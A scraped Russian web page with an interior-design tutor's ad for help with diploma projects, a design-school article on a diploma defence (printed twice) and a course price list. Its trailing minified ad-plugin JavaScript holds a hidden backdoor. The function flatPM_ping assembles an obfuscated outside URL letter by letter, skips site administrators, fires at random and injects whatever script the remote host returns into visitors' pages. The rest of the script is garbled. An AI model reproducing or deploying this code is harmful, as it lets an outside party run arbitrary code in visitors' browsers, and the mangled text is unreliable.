15 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Диплом дизайн интерьера

Помощь в создании курсовых и дипломных работ по дизайну интерьеров

Москва. Частный архитектор Дмитрий Мудров +7 903 1188886

  1. Главная
  2. Помощь в создании курсовых и…

3d визуализации курсовых и дипломных работ

Дипломный дизайн проект ресторана МШД

Курсовой дизайн проект квартиры МШД

Дипломный дизайн-проект ресторана. МШД

Дипломный дизайн-проект ресторана. МШД

ПОМОЩЬ ДИЗАЙНЕРА СРОЧНО.

Оказываю профессиональную помощь в создании курсовых и дипломных работ по дизайну интерьеров.

Доброго времени суток!

Меня зовут Дмитрий Мудров.

Я являюсь профессиональным дизайнером по интерьерам и архитектором. Я оказываю квалифицированную помощь в создании курсовых и дипломных работ по дизайну интерьеров .

С моей помощь Вы сможете легко и просто создать красивую, запоминающуюся дипломную работу по дизайн интерьеров. Подготовленные с моей помощью 3D визуализации не оставят равнодушной экзаменационную комиссию. Кроме этого профессионально и красиво выполненная дипломная работа станет прекрасным украшением Вашего портфолио.

С моей помощью Вы сможете быстро вычертить прекрасные планы и развертки в ArchiCAD, создать яркие 3D визуализации интерьеров в 3D MAX, а так же я открою Вам секреты цветокоррекции и создания коллажей в Photoshop .

Не тяните время. Обращайтесь сегодня. Помните, чем раньше Вы обратитесь за помощью в создании курсовой или дипломной работы, тем лучше будет дипломная работа!

О себе:

  • Опыт преподавания 3D MAX – 7 лет
  • Опыт преподавания ArchiCAD – 7 лет
  • ВУЗ: Московский Архитектурный Институт (МАрхИ)
  • Факультет: Жилые и общественные здания (ЖОЗ)
  • Специальность: Архитектор
  • Профессия: Архитектор, Дизайнер по интерьерам, Художник, Преподаватель 3D MAX, ArchiCAD, Photoshop
  • Основная сфера деятельности: дизайн интерьеров, помощь в создании курсовых и дипломных работ по дизайну интерьеров.
  • Специализация в 3D MAX: архитектура, дизайн интерьеров, промышленный дизайн
  • Специализация в ArchiCAD: архитектурное черчение, дизайн интерьеров
  • Опыт проектирования 50+ дизайн-проектов. Из них 20+ курсовых и дипломных дизайн-проектов квартир, ресторанов, офисов.
  • Опыт проектирования архитектурных курсовых и дипломных проектов для архитектурных факультетов.
  • В сфере архитектуры и дизайна интерьеров работаю 10 лет.

Звоните: +7 903 1188886

Или отправьте мне сообщение, а так же заявку на звонок через эту контактную форму:

Как стать дизайнером — 5. Защита дипломного проекта

Главная / Советы и идеи / Вдохновение / Как стать дизайнером — 5. Защита дипломного проекта

Михаил Лазукин Thu, 29 Jun 2017 11:00:55 +0300

Наш грандиозный эксперимент завершился ровно так, как мы и ожидали. В начале учебного года мы выбрали одну студентку Современной школы дизайна , которая начала постигать новую для себя профессию, не зная о ней ничего. И вот спустя год она вышла на дипломный проект и защитила его на отлично! О том, как это было, мы расскажем прямо сейчас.

В отличие от предыдущих зачётов по проектированию офиса, кафе и квартиры, которые сопровождались стандартным комплектом чертежей, дипломный проект включает в себя ещё и экономическое обоснование проекта с расчётом стоимости использованных материалов. Эта сумма не включает разработку спецэлементов, которые присутствуют в работе всех студентов.

Спецэлементы — это разработанные дизайнером (а пока студентом) пространственные перегородки, уникальные элементы мебели и предметы декора. То есть творчество в чистом виде и проявление индивидуальности!

Судя по отзывам студентов прежних выпусков, опыт самовыражения, полученный в стенах СШД, позволяет реализовать себя и в качестве дизайнера, и в качестве декоратора. Например, преподаватель Инна Луканова сама окончила СШД, сейчас она успешный дизайнер, как и восемь её одногруппников.

Защита диплома была открытой. Гостями стали студенты и все желающие посмотреть, чему же можно (и можно ли?) научиться за такой короткий срок. На диплом выпускники выходят с планировкой другой квартиры в том же плане, с которым они работали при проектировании офиса и кафе.

Это сделано специально — на одном плане студенты должны были научиться по-разному трактовать и использовать пространство в зависимости от запроса клиента, будь то бизнесмен или ресторатор. Многим во время обучения казалось, что из плана выжато всё и невозможно больше ничего придумать. Но новые варианты и идеи найти не так уж и сложно!

Когда «глаз замыливается», то можно перевернуть план и посмотреть на него с другого ракурса. Он становится другим, и так появляются новые идеи.

Подготовка альбома чертежей для диплома заняла значительно больше времени, чем зачётные проекты, поскольку дополнительно делалась электрика (план расстановки розеток, выключателей и коммутации светильников), маркировочный план, карта окраски стен, детальные планы кухни, санузла, потолочных конструкций, разрезы и детальные чертежи спецэлементов.

Уже после защиты диплома преподаватели отметили, что даже имея за плечами архитектурный опыт, было непросто сходу прочитать все дизайнерские находки и конструктивные решения в работах выпускников. Проекты вышли абсолютно разными по стилю, колористике, в каждом есть своя «изюминка» (некоторые можно посмотреть здесь, здесь и здесь). Одна дипломная работа даже получила высший балл — 10 из 10 возможных!

Невероятное трудолюбие и работоспособность позволили нашей Екатерине выйти на диплом с квартирой в новом плане. То есть она, по сути, сделала двойную работу. И какую работу!

Объём в объёме, разные уровни, необычное решение использования пространства с ленточным панорамным остеклением, качественный подбор текстур, логичный выбор колористического решения и отличное владение техникой визуализации. Была даже видеопрезентация проекта.

Во время перерыва мы поговорили с девушкой, которая хотела бы получить образование дизайнера интерьеров. Как это обычно бывает, она сначала отремонтировала свою квартиру, потом квартиру подруги. Но когда две знакомые её подруги обратились к ней с такой же просьбой, она поняла, что пришло время учиться и уже зарабатывать в качестве дизайнера.

После посещения нескольких школ дизайна она пришла и в СШД на защиту дипломов. И она была просто в шоке от увиденного. Постоянно спрашивала, а точно ли студенты не имели профильного образования? И сами делали эти проекты? И никто не чертил за них проектную документацию?

После защиты мы увидели её уже у стойки менеджеров, она оформляла договор на обучение. Возможно, в следующем году она также поразит комиссию своими наработками и идеями, как и нынешняя группа. Обучение в Современной школе дизайна группы, за которой мы так пристально следили, подошло к концу, и всем выпускникам уже не терпится получить свой первый заказ.

Мы стали как родные с преподавателями и с однокурсниками. Немного страшно покидать школу, но, думаю, с таким портфолио, какое мы приобрели за время обучения (наши зачётные работы — наши проекты), нам не будет стыдно перед работодателями, а с таким багажом знаний — перед заказчиками. Пожелайте нам побольше интересных проектов!

Дизайн интерьера с компьютерным моделированием

3D моделирование и визуализация

Курсы дизайна и фотографии

Веб-дизайн

Компьютерная графика и верстка

Эту Дипломную программу
в нашем Центре успешно закончили
1023 человек!

Хотите овладеть одной из самых престижных профессий? Иметь возможность заниматься творчеством и достойно зарабатывать? Быть востребованным высокооплачиваемым специалистом? Эта дипломная программа поможет вам достичь задуманного.

Дизайнер интерьера – востребованная высокооплачиваемая модная и престижная профессия. Вы сможете работать дома и в офисе, самостоятельно и в составе творческой группы. Вы реализуете свои идеи, увидите, как ваши замыслы воплощаются в реальной жизни и приносят радость людям.


Востребованность


Сложность

от 6 месяцев
Время освоения

от 60 т.р.
Средняя зарплата

«Специалист» – авторизованный учебный центр Autodesk и Discreet (с 2001 г.), лучший учебный центр Autodesk в России, первый авторизованный партнёр Autodesk в России по онлайн обучению (c 2011 г.), единственный в России авторизованный учебный центр Adobe, соответствующий требованиям новой партнёрской программы Adobe, первый и крупнейший в России учебный центр Adobe Systems, авторизованный учебный центр Graphisoft ArchiCAD (с 2002 г.).

Важно помнить, что интерьер – это не только красота, поэтому дизайнеру интерьера мало быть художником. Ему нужно уметь предлагать решения, учитывая размещение систем освещения, вентиляции, водоснабжения, важно понимать особенности различных материалов, чтобы воплотить дизайнерские решения было возможно в полной мере. И ещё одна важная составляющая профессии – умение общаться с заказчиками.

Что такое дипломные программы в «Специалисте»:

  1. Инновационная методика с использованием современных технологий.
  2. При прохождении дипломной программы в формате очного обучения, Вам будет предоставлен доступ к записям онлайн-обучения для самостоятельной подготовки и закрепления учебного материала.
  3. При очно-заочном обучении – дистанционное обучение в удобном темпе по записям онлайн-занятий, 1 очная консультация в неделю по расписанию (не менее 1/3 от общего времени обучения).
  4. Оплата в рассрочку: первоначальный взнос – 20% от стоимости дипломной программы.
  5. Престижные документы об окончании: диплом о профессиональной переподготовке по окончании всей программы, сертификат Центра международного образца (если предусмотрен), международный сертификат вендора после каждого авторизованного курса.
  6. Максимальная бесплатная поддержка при трудоустройстве к «работодателю вашей мечты»!
    Для наших выпускников на ежемесячной основе мы организуем Дни карьеры, семинары по теме «Трудоустройство». Каждую среду с 10-00 до 17-00 проводим карьерные консультации, запись по адресу job@specialist.ru. Предлагаем рассмотреть вакансии и стажировки в крупных и известных компаниях, лидерах рынка!

Дипломная программа «Дизайн интерьера с компьютерным моделированием» построена таким образом, что позволит вам освоить все необходимые для работы в сфере дизайна интерьеров знания и умения. Вы познакомитесь в теории и на практике с основополагающими понятиями, овладеете принципами композиционного построения, гармонии цвета, использования возможностей света. Вы узнаете историю стилей от эпохи Древнего Египта и Античности до наших дней и отработаете навыки стилизации интерьера на практике.

Будут рассмотрены вопросы структурирования жилого и общественного пространства в соответствии с нормативными требованиями, вы изучите современные отделочные и строительные материалы, узнаете нюансы их применения. Вы освоите все необходимые компьютерные программы, позволяющих моделировать дизайнерские проекты в 2D- и 3D-формате. Вы научитесь рисовать от руки, быстро выполнять эскизы, оперативно визуализировать проектные решения, чтобы сразу на месте показать заказчику, как будут решены те или иные дизайнерские задачи.

Учебная программа состоит из лекций, выездных и практических занятий, тестов, зачётов и индивидуальных консультаций по заданиям, по курсовому и дипломному проектированию. Итог обучения – защита дипломного дизайн-проекта интерьеров квартиры или загородного дома.

Перечень курсов, входящих в дипломную программу:

Курсы дипломной программы «Дизайн интерьера с компьютерным моделированием» ведут талантливые преподаватели-практики, специалисты высшей квалификации в области дизайна интерьера, компьютерного моделирования и графики.

При подаче материала дипломной программы акцент сделан на практическую сторону. На всех курсах, входящих в обучение, предусмотрено выполнение большого количества творческих заданий и их совместное обсуждение с другими слушателями, что позволяет моделировать отношения в дизайнерском коллективе, вырабатывает навык эффективной работы с заказчиком.

К окончанию дипломной программы у вас будет достаточно объёмное портфолио, которое произведёт должное впечатление на работодателя. После прохождения дипломной программы вы получите диплом о профессиональной переподготовке, а также сертификаты международного образца, подтверждающие владение специальными графическими программами.

Вы будете полностью готовы к работе в сфере дизайна интерьеров сразу после окончания дипломной программы.

Получите престижную творческую профессию! Запишитесь на дипломную программу Центра «Специалист»!

Обучение в рассрочку для дипломных программ — это выгодно и удобно!

Не ломайте голову, где взять всю сумму на обучение по дипломной программе, у нас Вы можете оплачивать его частями. Мы предлагаем Вам рассрочку на оплату обучения!

Стоимость обучения (рублей)*

Курс может быть заказан согласно ФЗ-44, ФЗ-223 (закупка/аукцион/запрос котировок/конкурсные процедуры)
с 10:00 до 17:00 Вечер или Выходные
Стандартная цена
Очно-заочно Онлайн Записаться
Частные лица 107 790 107 790 74 890 107 790
Организации 120 590 120 590 84 890 120 590
Первый взнос (для частных лиц) 21 550 21 550 14 950 21 550

— Программа повышения квалификации — Записаться

Как стать дизайнером — 5. Защита дипломного проекта

Главная / Советы и идеи / Вдохновение / Как стать дизайнером — 5. Защита дипломного проекта

Михаил Лазукин Thu, 29 Jun 2017 11:00:55 +0300

Наш грандиозный эксперимент завершился ровно так, как мы и ожидали. В начале учебного года мы выбрали одну студентку Современной школы дизайна , которая начала постигать новую для себя профессию, не зная о ней ничего. И вот спустя год она вышла на дипломный проект и защитила его на отлично! О том, как это было, мы расскажем прямо сейчас.

В отличие от предыдущих зачётов по проектированию офиса, кафе и квартиры, которые сопровождались стандартным комплектом чертежей, дипломный проект включает в себя ещё и экономическое обоснование проекта с расчётом стоимости использованных материалов. Эта сумма не включает разработку спецэлементов, которые присутствуют в работе всех студентов.

Спецэлементы — это разработанные дизайнером (а пока студентом) пространственные перегородки, уникальные элементы мебели и предметы декора. То есть творчество в чистом виде и проявление индивидуальности!

Судя по отзывам студентов прежних выпусков, опыт самовыражения, полученный в стенах СШД, позволяет реализовать себя и в качестве дизайнера, и в качестве декоратора. Например, преподаватель Инна Луканова сама окончила СШД, сейчас она успешный дизайнер, как и восемь её одногруппников.

Защита диплома была открытой. Гостями стали студенты и все желающие посмотреть, чему же можно (и можно ли?) научиться за такой короткий срок. На диплом выпускники выходят с планировкой другой квартиры в том же плане, с которым они работали при проектировании офиса и кафе.

Это сделано специально — на одном плане студенты должны были научиться по-разному трактовать и использовать пространство в зависимости от запроса клиента, будь то бизнесмен или ресторатор. Многим во время обучения казалось, что из плана выжато всё и невозможно больше ничего придумать. Но новые варианты и идеи найти не так уж и сложно!

Когда «глаз замыливается», то можно перевернуть план и посмотреть на него с другого ракурса. Он становится другим, и так появляются новые идеи.

Подготовка альбома чертежей для диплома заняла значительно больше времени, чем зачётные проекты, поскольку дополнительно делалась электрика (план расстановки розеток, выключателей и коммутации светильников), маркировочный план, карта окраски стен, детальные планы кухни, санузла, потолочных конструкций, разрезы и детальные чертежи спецэлементов.

Уже после защиты диплома преподаватели отметили, что даже имея за плечами архитектурный опыт, было непросто сходу прочитать все дизайнерские находки и конструктивные решения в работах выпускников. Проекты вышли абсолютно разными по стилю, колористике, в каждом есть своя «изюминка» (некоторые можно посмотреть здесь, здесь и здесь). Одна дипломная работа даже получила высший балл — 10 из 10 возможных!

Невероятное трудолюбие и работоспособность позволили нашей Екатерине выйти на диплом с квартирой в новом плане. То есть она, по сути, сделала двойную работу. И какую работу!

Объём в объёме, разные уровни, необычное решение использования пространства с ленточным панорамным остеклением, качественный подбор текстур, логичный выбор колористического решения и отличное владение техникой визуализации. Была даже видеопрезентация проекта.

Во время перерыва мы поговорили с девушкой, которая хотела бы получить образование дизайнера интерьеров. Как это обычно бывает, она сначала отремонтировала свою квартиру, потом квартиру подруги. Но когда две знакомые её подруги обратились к ней с такой же просьбой, она поняла, что пришло время учиться и уже зарабатывать в качестве дизайнера.

После посещения нескольких школ дизайна она пришла и в СШД на защиту дипломов. И она была просто в шоке от увиденного. Постоянно спрашивала, а точно ли студенты не имели профильного образования? И сами делали эти проекты? И никто не чертил за них проектную документацию?

После защиты мы увидели её уже у стойки менеджеров, она оформляла договор на обучение. Возможно, в следующем году она также поразит комиссию своими наработками и идеями, как и нынешняя группа. Обучение в Современной школе дизайна группы, за которой мы так пристально следили, подошло к концу, и всем выпускникам уже не терпится получить свой первый заказ.

Мы стали как родные с преподавателями и с однокурсниками. Немного страшно покидать школу, но, думаю, с таким портфолио, какое мы приобрели за время обучения (наши зачётные работы — наши проекты), нам не будет стыдно перед работодателями, а с таким багажом знаний — перед заказчиками. Пожелайте нам побольше интересных проектов!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика